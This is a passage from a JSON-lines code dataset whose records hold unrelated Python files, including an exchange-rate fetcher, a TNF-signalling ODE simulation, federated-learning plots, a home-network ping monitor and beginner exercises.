\n if prev == None:\n return 4\n \n agentPrev = deepcopy(prev.original[i])\n agentCurr = deepcopy(self.original[i])\n \n if prev.collision:\n agentCurr['x'] = 0\n agentCurr['y'] = 0\n \n if action == 0:\n agentCurr['y'] = agentCurr['y'] + 1\n elif action == 1:\n agentCurr['x'] = agentCurr['x'] + 1\n elif action == 2:\n agentCurr['y'] = agentCurr['y'] - 1\n elif action == 3:\n agentCurr['x'] = agentCurr['x'] - 1\n\n dX = agentCurr['x'] - agentPrev['x'] \n dY = agentCurr['y'] - agentPrev['y']\n\n if dY > 1:\n dY = dY - self.rows\n\n if dY < -1:\n dY = dY + self.rows\n\n if dX > 1:\n dX = dX - self.cols\n\n if dX < -1:\n dX = dX + self.cols\n \n if dY == 1:\n a = 0\n elif dX == 1:\n a = 1\n elif dY == -1:\n a = 2\n elif dX == -1:\n a = 3\n else:\n a = 4\n\n #print 'sAct: %d Prev: (%d,%d) Curr: (%d,%d) Corr: (%d,%d) Mv: (%d,%d) -> (%d,%d) oAct: %d' % (action, agentPrev['x'], agentPrev['y'], self.original[i]['x'], self.original[i]['y'], agentCurr['x'], agentCurr['y'], agentCurr['x'] - agentPrev['x'], agentCurr['y'] - agentPrev['y'], dX, dY, a)\n\n return a \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"pursuit/src/python_src/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":6175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"240479279","text":"import logging\nimport pandasdmx as sdmx\nimport itertools\nimport csv\nimport datetime\nimport uuid\nimport holidays\n\nlogging.basicConfig(level=logging.INFO)\n\nWSDL_ADDR_STR = \"https://sdw-wsrest.ecb.europa.eu/service/\"\nRESOURCE = \"data\"\nFLOWREF = \"EXR\" # Data flow key for exchange rates (FlowRef)\n\n\"\"\"\nkey explanation by ECB: https://sdw-wsrest.ecb.europa.eu/help/\nthe frequency at which they are measured (e.g.: on a daily basis - code D),\nthe currency being measured (e.g.: US dollar - code USD),\nthe currency against which a currency is being measured (e.g.: Euro - code EUR),\nthe type of exchange rates (Foreign exchange reference rates - code SP00) and\nthe series variation (such as average or standardised measure for given frequency, code A).\n\"\"\"\n\n\nclass CurrencyCodes(object):\n @classmethod\n def currency_code_dict(cls) -> dict:\n currency_code_dict = {} # Create a dict of all currency codes to assert user input\n with open(\"currency_codes.csv\", \"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n currency_code_dict[row[2]] = True\n return currency_code_dict.copy() # Return a copy to avoid modifying it\n\n\ndef assert_input_is_valid(from_currency_list: list, to_currency_list: list, from_date: str, to_date: str) -> bool:\n date_format = \"%Y-%m-%d\"\n\n try:\n for currency in from_currency_list + to_currency_list:\n assert CurrencyCodes.currency_code_dict().get(currency) is not None\n except AssertionError:\n raise ValueError(\"Currency %s supplied by user does not exist\" % currency)\n\n try:\n from_date_obj = datetime.datetime.strptime(from_date,\n date_format) # Will raise Value Error if date format is not correct\n to_date_obj = datetime.datetime.strptime(to_date, date_format)\n assert from_date_obj <= to_date_obj\n except AssertionError:\n raise ValueError(\"from_date %s is greater than to_date %s\" % from_date, to_date)\n\n try:\n assert from_currency_list != to_currency_list\n except AssertionError:\n raise ValueError(\"from_currency_list is equal to to_currency_list. Please select different currencies.\")\n\n\ndef get_nearest_workday(from_date: str) -> str:\n ecb_holidays = holidays.CountryHoliday('ECB') # Get the holidays of Euro central bank\n date_format = \"%Y-%m-%d\"\n\n try:\n assert from_date in ecb_holidays\n except AssertionError:\n from_date_object = datetime.datetime.strptime(from_date, date_format).date()\n logging.info(\"from_date %s is not an ECB workday. Selecting nearest earlier date\", from_date)\n for i in range(1, 10):\n if from_date_object - datetime.timedelta(days=i) in ecb_holidays:\n nearest_date = str(from_date_object - datetime.timedelta(days=i))\n logging.info(\"Nearest date found: %s\", nearest_date)\n return nearest_date\n\n\ndef get_conversion_rates_df(\n from_currency_list: list = [\"EUR\"],\n to_currency_list: list = [\"USD\"],\n from_date: str = str(datetime.date.today()),\n to_date: str = str(datetime.date.today())\n) -> None:\n assert_input_is_valid(from_currency_list, to_currency_list, from_date, to_date)\n from_date = get_nearest_workday(from_date)\n list_of_currencies_to_compare = itertools.product(from_currency_list, to_currency_list)\n\n key = dict(CURRENCY=from_currency_list + to_currency_list, FREQ='D', CURRENCY_DENOM='EUR')\n ecb = sdmx.Request('ECB')\n parameters = {\n 'startPeriod': from_date, # Start date of the time series\n 'endPeriod': to_date # End of the time series\n }\n data_msg = ecb.data('EXR', key=key, params=parameters)\n df = sdmx.to_pandas(data_msg.data[0], datetime='TIME_PERIOD')\n for conversion_pair in list_of_currencies_to_compare:\n df[\"EXR: \" + conversion_pair[0] + \"/\" + conversion_pair[1]] = df.D[conversion_pair[0]] / df.D[\n conversion_pair[1]]\n filename = str(datetime.date.today()) + str(uuid.uuid4())[0:8]\n df.to_excel(filename + \".xlsx\")\n","sub_path":"conversion_rates.py","file_name":"conversion_rates.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"482758949","text":"\ndef registerPredefined(modules_avail):\n for m in [\"modules\", \"events\", \"info\", \"settings\"]:\n module_name_id = 'miniflask.' + m\n importname = 'miniflask.modules.' + m\n modules_avail[module_name_id] = {\n 'id': module_name_id,\n 'importpath': \"system\",\n 'importname': importname,\n 'lowpriority': False\n }\n","sub_path":"util/miniflask/src/miniflask/modules/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"134134966","text":"#!/bin/python\nimport serial\nimport keyboard\nimport io\nfrom time import sleep\nser = serial.Serial(input(\"Serial port: \"))\nsio = io.TextIOWrapper(io.BufferedRWPair(ser, ser))\nwhile 1:\n\t#s = int(sio.readline())\n\ts = int(ser.read(2));\n\tif s > 9:\n\t\ts = s - 9\n\t\tif s == 1:\n\t\t\tkeyboard.release('e')\n\t\telif s == 2:\n\t\t\tkeyboard.release('space')\n\t\telif s == 3:\n\t\t\tkeyboard.release('shift')\n\t\telif s == 4:\n\t\t\tkeyboard.release('a')\n\t\telif s == 5:\n\t\t\tkeyboard.release('w')\n\t\telif s == 6:\n\t\t\tkeyboard.release('d')\n\t\telif s == 7:\n\t\t\tkeyboard.release('w')\n\t\telif s == 8:\n\t\t\tkeyboard.release('e')\n\t\telif s == 9:\n\t\t\tkeyboard.release('shift')\n\telse:\n\t\tif s == 1:\n\t\t\tkeyboard.press('e')\n\t\telif s == 2:\n\t\t\tkeyboard.press('space')\n\t\telif s == 3:\n\t\t\tkeyboard.press('shift')\n\t\telif s == 4:\n\t\t\tkeyboard.press('a')\n\t\telif s == 5:\n\t\t\tkeyboard.press('w')\n\t\telif s == 6:\n\t\t\tkeyboard.press('d')\n\t\telif s == 7:\n\t\t\tkeyboard.press('w')\n\t\telif s == 8:\n\t\t\tkeyboard.press('e')\n\t\telif s == 9:\n\t\t\tkeyboard.press('shift')\n\n","sub_path":"python/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"111152886","text":"# import tensorflow as tf\n# import numpy as np\n# import mnist_data\n# import os\nfrom rlkit.torch.vae.conv_vae import ConvVAE\nfrom rlkit.torch.vae.vae_trainer import ConvVAETrainer\nfrom rlkit.torch.vae.pusher2d_data import get_data\n# import plot_utils\n# import glob\n# import ss.path\n\n# import argparse\nfrom rlkit.launchers.arglauncher import run_variants\nimport rlkit.torch.pytorch_util as ptu\n\nfrom rlkit.misc.ml_util import PiecewiseLinearSchedule\n\ndef experiment(variant):\n if variant[\"use_gpu\"]:\n gpu_id = variant[\"gpu_id\"]\n ptu.set_gpu_mode(True)\n ptu.set_device(gpu_id)\n\n beta = variant[\"beta\"]\n representation_size = variant[\"representation_size\"]\n train_data, test_data = get_data(10000)\n m = ConvVAE(representation_size, input_channels=3)\n t = ConvVAETrainer(train_data,\n test_data,\n m,\n beta_schedule=PiecewiseLinearSchedule([0, 400, 800], [0.5, 0.5, beta])\n )\n for epoch in range(1001):\n t.train_epoch(epoch)\n t.test_epoch(epoch)\n t.dump_samples(epoch)\n\nif __name__ == \"__main__\":\n variants = []\n\n for representation_size in [4, 8, 16, 32]:\n variant = dict(\n beta=5.0,\n representation_size=representation_size,\n snapshot_mode=\"gap\",\n snapshot_gap=100,\n )\n variants.append(variant)\n run_variants(experiment, variants, run_id=1)\n","sub_path":"experiments/ashvin/vae/new_pusher2d_schedule.py","file_name":"new_pusher2d_schedule.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"156350767","text":"default = {\n \"fuente_titulo\" : (\"Inter\", 15),\n \"fuente_fields\": (\"Inter\", 12),\n \"color_bg_general\": \"white\",\n \"color_letra_general\": \"black\",\n \"color_letra_botones\": \"white\",\n \"color_bg_botones\": \"#455054\",\n \"color_input\": \"gray\",\n \"color_bg_canvas\": \"#F5F5DC\",\n \"color_green\": \"#C6E5B1\",\n \"color_red\": \"#FF6961\",\n \"color_yellow\": \"#FBC05F\",\n \"color_white\": \"#E8DCCA\",\n \"reference_width\" : 1200,\n \"reference_height\" : 500\n}","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"57538820","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.insert(0,'..')\n\n\n\nMARKER_SIZE=0\n\n# Init\nplt.figure()\n\n#epochs = 50\n## Add vertical Lines\n#for i in range(epochs):\n# plt.axvline(\n# i+1, linewidth=0.5, color='black', linestyle='dotted', alpha=0.5)\n\n# No FL results\nfrom non_fedlearn_7_frames.raw_non_fedlearn_7_frames_200 import results\ntypes = ['test-top1', 'test-top3']\nlegend = {'test-top1': 'no-fl-top-1', 'test-top3': 'no-fl-top-3'}\n### IMPORTANT!!!!!!! LAST EPOCH IS LAST TEST WITH BEST RESULT AND CLUSTERING\nepochs = len(results) - 1\nX_AXIS = list(map(lambda x: x+1, range(epochs)))\nfor t in types:\n y_values = [(e, x[t]) for e, x in results.items()][:-1]\n y_values = list(sorted(y_values, key=lambda t: t[0])) # Order by epoch asc\n y_values = [x[1] for x in y_values]\n plt.plot(X_AXIS, y_values, linewidth=1, label=legend[t], marker='o', markersize=MARKER_SIZE)\n plt.legend(loc=\"upper right\")\n\n# IID results:\nfrom raw_5_clients_iid_7_frames_200_cr import results\nepochs = len(results)\nX_AXIS = list(map(lambda x: x+1, range(epochs)))\ntypes = ['test-top1', 'test-top3']\nlegend = {'test-top1': '5-clients-iid-top-1',\n 'test-top3': '5-clients-iid-top-3'}\nfor t in types:\n y_values = [x['test_result'][t] for x in results]\n plt.plot(X_AXIS,\n y_values,\n linewidth=1,\n label=legend[t],\n linestyle='solid',\n marker=\"^\",\n markersize=MARKER_SIZE)\n plt.legend(loc=\"upper right\")\n\n# NON-IID results:\nfrom raw_5_clients_non_iid_7_frames_200_cr import results\nepochs = len(results)\nX_AXIS = list(map(lambda x: x+1, range(epochs)))\ntypes = ['test-top1', 'test-top3']\nlegend = {'test-top1': '5-clients-non-iid-top-1',\n 'test-top3': '5-clients-non-iid-top-3'}\nfor t in types:\n y_values = [x['test_result'][t] for x in results]\n plt.plot(X_AXIS,\n y_values,\n linewidth=1,\n label=legend[t],\n linestyle='solid',\n marker=\"s\",\n markersize=MARKER_SIZE)\n plt.legend(loc=\"upper right\")\n\n# Limits\nplt.axis(xmin=0, xmax=epochs+1, ymin=0, ymax=100)\n\n# Labels\n#plt.title('1 input frame comparison with 9 clients')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch / Communication Round')\n\n# Save\nplt.savefig('result.png', dpi=400)\n","sub_path":"results/5_clients_7_frames/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"468022285","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 27 15:32:42 2020\r\n\r\n@author: b308 Yu-Chuan Chen\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n#variable name\r\nsi = ['TNF', 'TNFR1', 'TNFR1a' , 'TRADD', 'TNFR1a_TRADD', 'TRAF2', 'early_complex', \r\n 'RIPK1','early_complex_RIPK1', 'IKK', 'early_complex_RIPK1_IKK', 'IKKa',\r\n 'IκB_NFκB', 'IκB_NFκB_IKKa', 'IκBp', 'NFκB', \r\n 'FADD', 'early_complex_RIPK1_FADD', 'TRADD_TRAF2_RIPK1_FADD', \r\n 'Caspase8', 'TRADD_TRAF2_RIPK1_FADD_Caspase8', 'Caspase8a', 'Caspase3', 'Caspase8a_Caspase3',\r\n 'Caspase3a', 'DNA_fragmentation', 'cIAP', 'Caspase3a_cIAP' ,'DNA', 'Caspase3a_DNA', 'IκB']\r\n\r\n#%% create data fold\r\npath = 'D:/Yu-Chuan/ForYuChuan/python program/survial_death_model/ODE/conc/'\r\n\r\ndef createFold(f_dir): \r\n try:\r\n os.makedirs(f_dir)\r\n except FileExistsError:\r\n print(\"The directory has been created on %s\" % f_dir) \r\n except OSError:\r\n print (\"Creation of the directory %s failed\" % f_dir) \r\n else:\r\n print (\"Successfully created the directory %s\" % f_dir)\r\n \r\n# f_dir = path + folder\r\nf_dir = path + 'result/' \r\ncreateFold(f_dir)\r\n\r\n# npy saving\r\nsave_name = path + 'SDM_ODE_conc'\r\n\r\n#%% kinetic Parameter and initial value\r\nk1 = 0.185 *1e-3 # sce-1*nM-1 \r\nk2 = 0.00125 *1e-3 \r\nk3 = 0.185 *1e-3 # sce-1*nM-1\r\nk4 = 0.00125 *1e-3 \r\nk5 = 0.185 *1e-3 # sce-1*nM-1\r\nk6 = 0.00125 *1e-3 \r\nk7 = 0.185 *1e-3 # sce-1*nM-1\r\nk8 = 0.00125 *1e-3 \r\nk9 = 0.185 *1e-3 # sce-1*nM-1\r\nk10 = 0.00125 *1e-3\r\nk11 = 0.37 *1e-3 \r\nk12 = 0.014 *1e-3 # sce-1*nM-1\r\nk13 = 0.00125 *1e-3\r\nk14 = 0.37 *1e-3 \r\nk15 = 0.185 *1e-3 # sce-1*nM-1\r\nk16 = 0.00125 *1e-3\r\nk17 = 0.37 *1e-3 \r\nk18 = 0.5 *1e-3 # sce-1*nM-1\r\nk19 = 0.2 *1e-3\r\nk20 = 0.1 *1e-3 \r\nk21 = 0.1 *1e-3 # sce-1*nM-1\r\nk22 = 0.06 *1e-3\r\nk23 = 100 *1e-3\r\nk24 = 0.185 *1e-3 # sce-1*nM-1\r\nk25 = 0.00125 *1e-3\r\nk26 = 0.37 *1e-3\r\nk27 = 0.37 *1e-3\r\nk28 = 0.5 *1e-3 # sce-1*nM-1\r\nk29 = 750 *1e-3 # sce-1*nM-1\r\np = 1.75 *1e-3 \r\n\r\n#initial value\r\na = 10.\r\nTNF = a #1\r\nTNFR1 = 100. #2\r\nTNFR1a = 0. #3 \r\nTRADD = 150. #4\r\nTNFR1a_TRADD = 0. #5\r\nTRAF2 = 100. #6\r\nearly_complex = 0. #7 TNFR1a_TRADD_TRAF2\r\nRIPK1 = 100. #8\r\nearly_complex_RIPK1 = 0. #9 # early complex\r\nIKK = 100. #10\r\nearly_complex_RIPK1_IKK = 0. #11 # survival complex \r\nIKKa = 0. #12\r\nIκB_NFκB = 250. #13\r\nIκB_NFκB_IKKa = 0. #14\r\nIκBp = 0. #15\r\nNFκB = 0. #16\r\nFADD = 100. #17\r\nearly_complex_RIPK1_FADD = 0. #18\r\nTRADD_TRAF2_RIPK1_FADD = 0. #19 (compleII)\r\nCaspase8 = 80. #20\r\nTRADD_TRAF2_RIPK1_FADD_Caspase8 = 0. #21 \r\nCaspase8a = 0. #22\r\nCaspase3 = 200. #23\r\nCaspase8a_Caspase3 = 0. #24\r\nCaspase3a = 0. #25\r\nDNA_fragmentation = 0. #26\r\ncIAP = 0. #27\r\nCaspase3a_cIAP = 0. #28\r\nDNA = 800. #29\r\nCaspase3a_DNA = 0. #30\r\nIκB = 0. #31\r\n\r\n#%% functions\r\ndef stoichoi_M (var):\r\n rxn = 2*var\r\n V = np.zeros((var,rxn))\r\n for i in range(var):\r\n V[i, 2*i] = 1\r\n V[i, 2*i+1] = -1 \r\n return V\r\n\r\ndef model(P, dt, NFkB_delay):\r\n \r\n [TNF, TNFR1, TNFR1a , TRADD, TNFR1a_TRADD, TRAF2, early_complex, \r\n RIPK1,early_complex_RIPK1, IKK, early_complex_RIPK1_IKK, IKKa,\r\n IκB_NFκB, IκB_NFκB_IKKa, IκBp, NFκB, \r\n FADD, early_complex_RIPK1_FADD, TRADD_TRAF2_RIPK1_FADD, \r\n Caspase8, TRADD_TRAF2_RIPK1_FADD_Caspase8, Caspase8a, Caspase3, Caspase8a_Caspase3,\r\n Caspase3a, DNA_fragmentation, cIAP, Caspase3a_cIAP, DNA, Caspase3a_DNA, IκB ] = P \r\n NFkB_delay = NFkB_delay\r\n \r\n D = np.array([\r\n # TNF c1\r\n k2*TNFR1a,\r\n k1*TNF*TNFR1,\r\n # TNFR1 c2\r\n (k2*TNFR1a + k17*early_complex_RIPK1_FADD + k11* early_complex_RIPK1_IKK)*10**(-1.7),\r\n k1*TNF*TNFR1a,\r\n #TNFR1a c3\r\n k1*TNF*TNFR1 + k4* TNFR1a_TRADD,\r\n k2*TNFR1a + k3* TNFR1a * TRADD,\r\n # TRADD c4\r\n k4* TNFR1a_TRADD + k11* early_complex_RIPK1_IKK + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k3* TNFR1a* TRADD,\r\n # TNFR1a_TRADD c5\r\n k3* TNFR1a* TRADD + k6* early_complex,\r\n k4* TNFR1a_TRADD + k5* TNFR1a_TRADD* RIPK1,\r\n # RIPK1 c6\r\n k6* early_complex + k11* early_complex_RIPK1_IKK + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k5* TNFR1a_TRADD * RIPK1,\r\n # early_complex c7\r\n k5* TNFR1a_TRADD * RIPK1 + k8* early_complex_RIPK1,\r\n k6* early_complex + k7* early_complex* RIPK1,\r\n # RIPK1 c8\r\n k8* early_complex_RIPK1 + k11* early_complex_RIPK1_IKK+ k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k7* early_complex* RIPK1,\r\n # early_complex_RIPK1 c9\r\n k7* early_complex* RIPK1 + k10* early_complex_RIPK1_IKK + k16* early_complex_RIPK1_FADD,\r\n k8* early_complex_RIPK1 + k9* early_complex_RIPK1*IKK + k15* early_complex_RIPK1 * FADD,\r\n # IKK c10\r\n k10* early_complex_RIPK1_IKK + k14* IκB_NFκB_IKKa,\r\n k9* early_complex_RIPK1* IKK,\r\n # early_complex_RIPK1_IKK c11\r\n k9* early_complex_RIPK1* IKK,\r\n k10* early_complex_RIPK1_IKK + k11* early_complex_RIPK1_IKK,\r\n # IKKa c12\r\n k11* early_complex_RIPK1_IKK + k13* IκB_NFκB_IKKa,\r\n k12* IKKa * IκB_NFκB,\r\n # IκB_NFκB c13,\r\n k13* IκB_NFκB_IKKa + k29* NFκB * IκB,\r\n k12* IKKa * IκB_NFκB,\r\n # IκB_NFκB_IKKa c14\r\n k12* IKKa * IκB_NFκB,\r\n k13* IκB_NFκB_IKKa + k14* IκB_NFκB_IKKa, \r\n # IκBp c15\r\n k14* IκB_NFκB_IKKa,\r\n 0,\r\n # NFκB c16 \r\n k14* IκB_NFκB_IKKa,\r\n k29* NFκB* IκB,\r\n # FADD c17\r\n k16* early_complex_RIPK1_FADD + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k15* early_complex_RIPK1* FADD,\r\n # early_complex_RIPK1_FADD c18\r\n k15* early_complex_RIPK1* FADD,\r\n k16* early_complex_RIPK1_FADD + k17* early_complex_RIPK1_FADD,\r\n # TRADD_TRAF2_RIPK1_FADD c19\r\n k17* early_complex_RIPK1_FADD + k19* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k18* TRADD_TRAF2_RIPK1_FADD* Caspase8,\r\n # Caspase8 c20\r\n k19* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n k18* TRADD_TRAF2_RIPK1_FADD* Caspase8,\r\n # TRADD_TRAF2_RIPK1_FADD_Caspase8 c21\r\n k18* TRADD_TRAF2_RIPK1_FADD* Caspase8,\r\n k19* TRADD_TRAF2_RIPK1_FADD_Caspase8 + k20* TRADD_TRAF2_RIPK1_FADD_Caspase8,\r\n # Caspase8a c22\r\n k20* TRADD_TRAF2_RIPK1_FADD_Caspase8 + k22* Caspase8a_Caspase3 + k23 * Caspase8a_Caspase3,\r\n k21* Caspase8a* Caspase3,\r\n # Caspase3 c23\r\n k22* Caspase8a_Caspase3 + k26* Caspase3a_DNA,\r\n k21* Caspase8a* Caspase3,\r\n # Caspase8a_Caspase3 c24\r\n k21* Caspase8a* Caspase3,\r\n k22* Caspase8a_Caspase3 + k23* Caspase8a_Caspase3,\r\n # Caspase3a c25\r\n k23* Caspase8a_Caspase3 + k25* Caspase3a_DNA,\r\n k28*cIAP* Caspase3a + k24* DNA* Caspase3a,\r\n # DNA_fragmentation c26\r\n k26* Caspase3a_DNA,\r\n 0,\r\n # cIAP c27\r\n p* NFkB_delay,\r\n k28* cIAP* Caspase3a,\r\n # Caspase3a_cIAP c28\r\n k28* cIAP* Caspase3a,\r\n 0,\r\n # DNA c29\r\n k25* Caspase3a_DNA,\r\n k24* Caspase3a* DNA,\r\n # Caspase3a_DNA c30\r\n k24* Caspase3a* DNA,\r\n k25* Caspase3a_DNA + k26* Caspase3a_DNA,\r\n # IkB c31\r\n p* NFkB_delay, \r\n k29* NFκB* IκB\r\n \r\n ]).reshape(2*var,1)\r\n \r\n VD = np.matmul(V,D)*dt \r\n \r\n return VD.reshape(len(P))\r\n\r\n# Euler method\r\ndef euler_claculate(model, P, dt, delay_time): \r\n P[:,0] = x0 \r\n delay_index = int(delay_time/dt)\r\n for i in range(t_step): \r\n NFkB_delay = P[15][max(0,i-delay_index)]\r\n P[:,i+1] = P[:,i] + model(P[:,i], dt ,NFkB_delay)\r\n \r\n return P\r\n\r\n#%% program runnig\r\n# varibles\r\nx0 = np.array([\r\n TNF, TNFR1, TNFR1a , TRADD, TNFR1a_TRADD, TRAF2, early_complex, \r\n RIPK1,early_complex_RIPK1, IKK, early_complex_RIPK1_IKK, IKKa,\r\n IκB_NFκB, IκB_NFκB_IKKa, IκBp, NFκB, \r\n FADD, early_complex_RIPK1_FADD, TRADD_TRAF2_RIPK1_FADD, \r\n Caspase8, TRADD_TRAF2_RIPK1_FADD_Caspase8, Caspase8a, Caspase3, Caspase8a_Caspase3,\r\n Caspase3a, DNA_fragmentation, cIAP, Caspase3a_cIAP ,DNA, Caspase3a_DNA, IκB\r\n ]) \r\n\r\n# initial condition\r\nt = 3600*12 \r\nt_step = 100000\r\nt_interval = np.linspace(0, t, t_step)\r\ndt = t_interval[-1]- t_interval[-2]\r\n\r\nX = np.zeros((len(x0), t_step+1))\r\nvar = len(x0)\r\nX[:,0] = x0 \r\n\r\nV = stoichoi_M(var)\r\ndelay_time = 60*20\r\n\r\n# calculate the result\r\nresult = euler_claculate(model, X, dt, delay_time)\r\nnp.save(save_name, result)\r\n\r\n#%% plot process\r\nXX = result[:, :-1]\r\n\r\nfor i , x in enumerate(XX) :\r\n plt.figure(figsize=(8.5,6), linewidth = 1.5)\r\n plt.plot(t_interval/60, x)\r\n #plt.legend([si[i]])\r\n plt.xlabel('time (min)', fontsize = 18)\r\n plt.ylabel('concentration (nM)', fontsize = 18) \r\n file_name = f_dir + si[i] + '.png'\r\n plt.xticks(fontsize=14)\r\n plt.yticks(fontsize=14)\r\n plt.savefig(file_name , dpi= 1500)\r\n\r\n","sub_path":"survial_death_model_conc.py","file_name":"survial_death_model_conc.py","file_ext":"py","file_size_in_byte":11496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"495433562","text":"# https://askubuntu.com/questions/87665/how-do-i-change-the-hostname-without-a-restart\n# sudo hostname your-new-name\n\n# https://askubuntu.com/questions/224559/how-to-find-all-the-used-ip-addresses-on-a-network\n# https://nmap.org/download.html#macosx\n# nmap -sn 192.168.1.0/24\n\n# https://www.turnkeylinux.org/node/41\n#ifconfig eth0 192.168.0.10 netmask 255.255.255.0 up\n\n#https://pricklytech.wordpress.com/2013/04/24/ubuntu-change-hostname-permanently-using-the-command-line/\nfrom kzpy3.utils2 import *\nimport threading\n\nComputers = {\n\t'ubuntu_laptop2':\t'192.168.1.100',\n\t'Mr_Blue':\t\t\t'192.168.1.102',\n\t'Mr_Black':\t\t\t'192.168.1.101',\n\t'Mr_Orange':\t\t'192.168.1.103',\n\t'Mr_Yellow':\t\t'192.168.1.104',\n\t'Mr_Lt_Blue':\t\t'192.168.1.105',\n\t'Mr_Purple':\t\t'192.168.1.106',\n\t'iMac':\t\t\t\t'192.168.1.39',\n\t}\n\nComputers_online = {}\n\ndef ping_test(*args):\n\t\"\"\"\n\tArgs[IP_ADDRESS]\n\t\"\"\"\n\tArgs = args_to_dictionary(args)\n\tTrue\n\tresult = unix(d2n('sudo ping -c 1 -W 0.3 -i 0.2 ',Args[IP_ADDRESS]))\n\tfor i in rlen(result):\n\n\t\tif 'transmitted' in result[i]:\n\t\t\t#print result\n\t\t\tnum_str = result[i].split('transmitted')[1].split(' ')[1]\n\t\t\t#print num_str\n\t\t\treturn int(num_str)\n\ndef ping_status():\n\tprint('ping status:')\n\tfor k in sorted(Computers_online):\n\t\tprint(d2n('\\t',k,' (',Computers[k],') ',dp(time.time()-Computers_online[k],2),' s ago'))\n\nSTOP_PING_TEST_THREAD = 'STOP_PING_TEST_THREAD'\nP = {}\nP[STOP_PING_TEST_THREAD] = False\n\ndef ping_test_thread():\n\twhile True:\n\t\tif P[STOP_PING_TEST_THREAD]:\n\t\t\treturn\n\t\tfor k in sorted(Computers):\n\t\t\tif ping_test(IP_ADDRESS,Computers[k]):\n\t\t\t\tComputers_online[k] = time.time()\n\nthreading.Thread(target=ping_test_thread).start()","sub_path":"scratch/c/_networking.py","file_name":"_networking.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"597096288","text":"import os.path\ndef count_char(fn):\n if os.path.isfile(fn):\n with open(fn, 'r') as fh:\n total = 0\n for line in fh:\n total += len(line)\n return total\n\n\nfn = \"D:/chromium/SES2020spring-master/SES2020spring-master/unit2/readme.md\"\nfh = open(fn, \"r\").read()\n\nif os.path.isfile(fn):\n char_num = count_char(fn)\n line_num = fh.count(\"\\n\")\n words_num = len(fh.split())\n print('文件地址:{}\\n字符共{}个\\n行:{}\\n单词共{}个'.format(fn, char_num, line_num, words_num))\nelse:\n print('路径错误')","sub_path":"670homework2.py","file_name":"670homework2.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"129726564","text":"class LDO(object):\n \"\"\"\n Live Data Object is the default and template data file loading class.\n\n This serves as a base for all other data objects. The default ``__init__``\n method need not be called for sub-classes however it must always be capable\n of taking no arguments to create a blank LDO.\n\n This object, as is, will simply load the lines of a text file\n \"\"\"\n def __init__(self):\n self.lines = []\n\n def load(self, text):\n \"\"\"Create the LDO from the given string argument ``text``.\"\"\"\n self.lines = []\n for line in text.split('\\n'):\n if line.strip():\n self.lines.append(line)\n\n def text(self):\n \"\"\"\n When the LDO is ready to be written back into a plain text file this\n method is used to get the text to fill the file with.\n \"\"\"\n if not self.lines:\n return ''\n elif len(self.lines) == 1:\n return self.lines[0] + '\\n'\n else:\n return '\\n'.join([line for line in self.lines if line.strip()]) + '\\n'\n","sub_path":"doby/ldo.py","file_name":"ldo.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"85264683","text":"#print(\"\\n\")\r\n#\r\n#paragraph = \"This is \\\r\n#some text\"\r\n#print (paragraph)\r\n#print(\"\\n\")\r\n#\r\n#arr = ['Mango' , 'Orange', 'Banana', 'Chickoo', 'Cherry', 'Peach']\r\n#\r\n#val1 = 10\r\n#print (val1)\r\n\r\na=not 5<4 \r\nprint (a)\r\n\r\na=20 \r\nb=20 \r\nif( a is b): \r\n print (\"a,b have same identity?\") \r\nelse: \r\n print (\"a,b are different identity?\") \r\n\r\nlist1 = ['Mango' , 'Orange', 'Banana', 'Chickoo', 'Cherry', 'Peach']\r\nlist2 = [55,66,99,65,78,12,98,67,45,88,12,56,66,100,121,22,444,446]\r\nprint (list2[-7:-3])\r\nprint (list2*9)\r\n#print (list2[:])\r\n\r\n\r\ntuple1 = ('Ahmed', 'Ali', 'Asif', 'Hamza', 'John', 'Shawn')\r\nprint(tuple1[::-1]) \r\nprint (tuple1*2)\r\n\r\na=(1,2,3,4,5,6,7,8,9,10)\r\nsliceObj = slice(2,5)\r\nprint (a[sliceObj])\r\n\r\ndic = {'Name':'Charlie', 'Age':'22', 'Hobby':'Progamming'}\r\nprint (dic)\r\n\r\n#input(\"\\n\\nPress the enter key to exit.\")\r\n\r\n#bitwise operators\r\na = 60 # 60 = 